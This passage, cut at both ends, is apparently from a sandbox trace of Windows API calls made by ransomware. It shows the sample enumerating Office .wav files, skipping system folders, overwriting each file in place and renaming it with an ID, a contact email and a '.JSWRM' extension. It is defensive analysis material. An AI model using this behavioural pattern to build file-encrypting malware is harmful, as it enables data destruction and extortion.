lpString2="$RECYCLE.BIN") returned 1 [0135.317] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="system volume information") returned -1 [0135.317] lstrcmpiW (lpString1="LYNC_onhold.wav", lpString2="msocache") returned -1 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_onhold.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_onhold.wav", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_onhold.wav", lpUsedDefaultChar=0x0) returned 15 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_onhold.wav", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_onhold.wav", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_onhold.wav", lpUsedDefaultChar=0x0) returned 15 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_onhold.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_onhold.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.318] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=879596) returned 1 [0135.318] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.318] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.336] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.336] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.337] CloseHandle (hObject=0x238) returned 1 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0135.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0135.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0135.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0135.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0135.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_onhold.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_onhold.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_onhold.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_onhold.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0135.339] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c054, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_presence.wav", cAlternateFileName="LYNC_P~1.WAV")) returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2=".") returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="..") returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="...") returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="windows") returned -1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="recovery") returned -1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="perflogs") returned -1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="documents and settings") returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="system volume information") returned -1 [0135.339] lstrcmpiW (lpString1="LYNC_presence.wav", lpString2="msocache") returned -1 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_presence.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_presence.wav", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_presence.wav", lpUsedDefaultChar=0x0) returned 17 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_presence.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_presence.wav", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_presence.wav", lpUsedDefaultChar=0x0) returned 17 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0135.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0135.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_presence.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_presence.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.340] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=245844) returned 1 [0135.340] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.340] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.479] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.479] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.480] CloseHandle (hObject=0x238) returned 1 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0135.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0135.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0135.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0135.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0135.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_presence.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_presence.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_presence.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_presence.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0135.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0135.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0135.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0135.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0135.482] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0d373e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0d373e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0d373e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x539a0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_redirect.wav", cAlternateFileName="LYNC_R~2.WAV")) returned 1 [0135.482] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2=".") returned 1 [0135.482] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="..") returned 1 [0135.482] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="...") returned 1 [0135.482] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="windows") returned -1 [0135.482] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="recovery") returned -1 [0135.483] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="perflogs") returned -1 [0135.483] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="documents and settings") returned 1 [0135.483] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.483] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="system volume information") returned -1 [0135.483] lstrcmpiW (lpString1="LYNC_redirect.wav", lpString2="msocache") returned -1 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_redirect.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_redirect.wav", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_redirect.wav", lpUsedDefaultChar=0x0) returned 17 [0135.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_redirect.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_redirect.wav", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_redirect.wav", lpUsedDefaultChar=0x0) returned 17 [0135.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0135.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0135.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_redirect.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_redirect.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.484] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=342432) returned 1 [0135.484] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.484] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.497] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.497] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.498] CloseHandle (hObject=0x238) returned 1 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0135.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0135.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0135.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0135.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0135.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_redirect.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_redirect.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_redirect.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_redirect.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0135.500] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0d373e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0d373e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0d373e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xafcac, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringback.wav", cAlternateFileName="LYNC_R~1.WAV")) returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2=".") returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="..") returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="...") returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="windows") returned -1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="recovery") returned -1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="perflogs") returned -1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="documents and settings") returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="system volume information") returned -1 [0135.500] lstrcmpiW (lpString1="LYNC_ringback.wav", lpString2="msocache") returned -1 [0135.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringback.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringback.wav", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringback.wav", lpUsedDefaultChar=0x0) returned 17 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringback.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0135.500] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringback.wav", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringback.wav", lpUsedDefaultChar=0x0) returned 17 [0135.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.500] RtlAllocateHeap 